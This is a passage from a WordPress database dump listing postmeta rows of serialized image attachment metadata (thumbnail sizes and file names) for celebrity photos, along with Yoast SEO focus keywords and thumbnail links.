carlett-Johansson-620x580.jpg\";s:5:\"width\";i:620;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:30:\"Scarlett-Johansson-289x420.jpg\";s:5:\"width\";i:289;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3609,559,'_yoast_wpseo_focuskw_text_input','Scarlett Johansen'),(3610,559,'_yoast_wpseo_content_score','60'),(3611,603,'_wp_attached_file','2015/11/harold_ramis1.jpg'),(3612,603,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:310;s:4:\"file\";s:25:\"2015/11/harold_ramis1.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"harold_ramis1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"harold_ramis1-300x186.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:186;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"harold_ramis1-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"harold_ramis1-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"harold_ramis1-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"harold_ramis1-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"harold_ramis1-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"harold_ramis1-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"harold_ramis1-324x310.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:310;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"harold_ramis1-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"harold_ramis1-356x310.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:310;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"harold_ramis1-500x261.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3613,558,'_yoast_wpseo_focuskw_text_input','Harold Ramis'),(3614,558,'_yoast_wpseo_content_score','60'),(3615,579,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:660;s:6:\"height\";i:440;s:4:\"file\";s:15:\"Jon_stewart.jpg\";}}'),(3616,605,'_wp_attached_file','2015/11/Jon_stewart-1.jpg'),(3617,605,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:660;s:6:\"height\";i:440;s:4:\"file\";s:25:\"2015/11/Jon_stewart-1.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Jon_stewart-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Jon_stewart-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Jon_stewart-1-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Jon_stewart-1-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Jon_stewart-1-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Jon_stewart-1-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Jon_stewart-1-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Jon_stewart-1-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Jon_stewart-1-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Jon_stewart-1-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Jon_stewart-1-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Jon_stewart-1-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Jon_stewart-1-534x440.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Jon_stewart-1-660x385.jpg\";s:5:\"width\";i:660;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Jon_stewart-1-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3618,568,'_thumbnail_id','586'),(3620,568,'_yoast_wpseo_primary_category',''),(3621,567,'_thumbnail_id','590'),(3623,567,'_yoast_wpseo_primary_category',''),(3624,20,'td_wp_editor',''),(3627,610,'_wp_attached_file','2015/11/sarah-hyland-1-e1480347110565.jpg'),(3628,610,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:498;s:6:\"height\";i:700;s:4:\"file\";s:41:\"2015/11/sarah-hyland-1-e1480347110565.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-213x300.jpg\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:39:\"sarah-hyland-1-e1480347110565-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:40:\"sarah-hyland-1-e1480347110565-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-498x261.jpg\";s:5:\"width\";i:498;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-498x462.jpg\";s:5:\"width\";i:498;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-498x385.jpg\";s:5:\"width\";i:498;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-498x486.jpg\";s:5:\"width\";i:498;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-498x580.jpg\";s:5:\"width\";i:498;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:41:\"sarah-hyland-1-e1480347110565-299x420.jpg\";s:5:\"width\";i:299;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3629,610,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1402;s:6:\"height\";i:1969;s:4:\"file\";s:18:\"sarah-hyland-1.jpg\";}}'),(3630,560,'_thumbnail_id','598'),(3631,560,'_yoast_wpseo_primary_category',''),(3632,559,'_thumbnail_id','602'),(3633,559,'_yoast_wpseo_primary_category',''),(3634,558,'_thumbnail_id','603'),(3635,558,'_yoast_wpseo_primary_category',''),(3636,614,'_wp_attached_file','2015/11/robert-kennedy1.jpg'),(3637,614,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:634;s:6:\"height\";i:635;s:4:\"file\";s:27:\"2015/11/robert-kennedy1.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:25:\"robert-kennedy1-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:26:\"robert-kennedy1-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-634x385.jpg\";s:5:\"width\";i:634;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-634x486.jpg\";s:5:\"width\";i:634;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-634x580.jpg\";s:5:\"width\";i:634;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:27:\"robert-kennedy1-419x420.jpg\";s:5:\"width\";i:419;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3638,553,'_yoast_wpseo_focuskw_text_input','Robert Kennedy'),(3639,553,'_yoast_wpseo_content_score','30'),(3640,553,'_thumbnail_id','614'),(3641,553,'_yoast_wpseo_primary_category',''),(3644,616,'_wp_attached_file','2015/11/calvin-klein.jpg'),(3645,616,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:634;s:6:\"height\";i:951;s:4:\"file\";s:24:\"2015/11/calvin-klein.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"calvin-klein-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"calvin-klein-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"calvin-klein-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"calvin-klein-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"calvin-klein-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"calvin-klein-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"calvin-klein-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"calvin-klein-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"calvin-klein-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"calvin-klein-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"calvin-klein-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"calvin-klein-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"calvin-klein-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"calvin-klein-634x385.jpg\";s:5:\"width\";i:634;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:24:\"calvin-klein-634x486.jpg\";s:5:\"width\";i:634;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:24:\"calvin-klein-634x580.jpg\";s:5:\"width\";i:634;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"calvin-klein-280x420.jpg\";s:5:\"width\";i:280;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3646,550,'_yoast_wpseo_focuskw_text_input','Calvin Klein'),(3647,550,'_yoast_wpseo_content_score','60'),(3648,550,'_thumbnail_id','616'),(3650,550,'_yoast_wpseo_primary_category',''),(3653,618,'_wp_attached_file','2015/11/Owen-Wilson.jpg'),(3654,618,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:970;s:6:\"height\";i:545;s:4:\"file\";s:23:\"2015/11/Owen-Wilson.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:21:\"Owen-Wilson-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:22:\"Owen-Wilson-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-696x391.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:391;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:23:\"Owen-Wilson-748x420.jpg\";s:5:\"width\";i:748;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3655,549,'_thumbnail_id','618'),(3656,549,'_yoast_wpseo_primary_category',''),(3657,549,'_yoast_wpseo_focuskw_text_input','Owen Wilson'),(3658,549,'_yoast_wpseo_content_score','60'),(3662,620,'_wp_attached_file','2015/11/danny-devito.jpg'),(3663,620,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:803;s:4:\"file\";s:24:\"2015/11/danny-devito.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"danny-devito-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"danny-devito-224x300.jpg\";s:5:\"width\";i:224;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"danny-devito-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"danny-devito-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"danny-devito-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"danny-devito-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"danny-devito-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"danny-devito-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"danny-devito-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"danny-devito-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"danny-devito-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"danny-devito-